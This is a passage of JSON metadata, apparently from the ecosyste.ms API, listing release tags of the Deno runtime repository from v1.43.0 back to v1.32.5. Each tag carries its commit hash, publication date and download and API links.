,"published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","downl